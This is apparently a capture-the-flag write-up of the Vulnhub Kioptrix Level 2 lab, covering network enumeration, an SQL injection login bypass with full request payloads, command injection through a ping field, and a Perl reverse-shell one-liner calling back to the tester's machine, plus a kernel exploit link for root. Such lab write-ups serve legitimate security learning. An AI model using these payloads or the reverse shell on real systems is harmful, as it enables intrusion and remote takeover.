Vulnhub – Kioptrix Level 1.1 (#2) Walkthrough

So, I’m here with my second write-up for Vulnhub – Kioptrix Level 2 challenge. So, we usually start by doing some enumeration on services. but before that we have to find out the IP Address of our machine.

Information Gathering

netdiscover will scan for all devices connected on your network or you can use arp-scan your choice.

Arp-scan

arp-scan --interface=eth0 --localnet

Now we have our target IP Address let’s take a look which services are running on that server.

Nmap

nmap -oA nmap -sC -sV 192.168.1.8

These are the services running on targeted machine.

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

Port 80 is Running Apache httpd 2.0.52 (CentOS)

Let’s take a look, http://192.168.1.8

Remote System Administration Login, Username and Password field let’s take a look at page source might we find something interesting.

<form method="post" name="frmLogin" id="frmLogin" action="index.php">
	<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
		<tr>
			<td colspan='2' align='center'>
			<b>Remote System Administration Login</b>
			</td>
		</tr>
		<tr>
			<td width="150">Username</td>
			<td><input name="uname" type="text"></td>
		</tr>
		<tr>
			<td width="150">Password</td>
			<td>
			<input name="psw" type="password">
			</td>
		</tr>
		<tr>
			<td colspan="2" align="center">
			<input type="submit" name="btnLogin" value="Login">
			</td>
		</tr>
	</table>
</form>

<!-- Start of HTML when logged in as Administator -->

Nothing special but since we do not have any security checks on username and password field we can try SQLi.

BurpSuite

Below is the request which we’re sending and check the response we got.

Request:

POST /index.php HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

uname=1' or '1' = '11&psw=1' or '1' = '1&btnLogin=Login

Response:

<!-- Start of HTML when logged in as Administator -->
	<form name="ping" action="pingit.php" method="post" target="_blank">
		<table width='600' border='1'>
		<tr valign='middle'>
			<td colspan='2' align='center'>
			<b>Welcome to the Basic Administrative Web Console<br></b>
			</td>
		</tr>
		<tr valign='middle'>
			<td align='center'>
				Ping a Machine on the Network:
			</td>
				<td align='center'>
				<input type="text" name="ip" size="30">
				<input type="submit" value="submit" name="submit">
			</td>
			</td>
		</tr>
	</table>
	</form>

So, it was simply SQL Injection (1′ or ‘1’ = ‘1).

We have tested manual SQL Injection. Let’s test SQLmap now.

SQLmap

It generated the payload for us!

Payload: uname=-2356' OR 1260=1260-- DpYb&psw=admin&btnLogin=Login

Reverse Shell

There’s an another field to run a ping command and tested SQL Injection vulnerabilities again and found a simple ‘;‘ semicolon can be used to bypass this.

So this is what i did.

192.168.1.1; perl -e 'use Socket;$i="192.168.1.9";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And i ran “nc -lvp 1337″ on my machine to get reverse shell.

Now we’re going after root access.

Root

By running LinEnum.sh script we couldn’t find anything interesting but you take a look at kernel version we have some exploits available for that kernel version.

Don’t Miss: A Guide To Linux Privilege Escalation

[-] Kernel information (continued):                                                           
Linux version 2.6.9-55.EL ([email protected]) (gcc version 3.4.6 20060404 (Red Hat 3.4.6
-8))

After doing Google searches found that this exploit might work so i gave it a try and it actually worked.

Don’t Miss: Linux Privilege Escalation Scripts

https://www.exploit-db.com/exploits/9545/

Back to top button
Close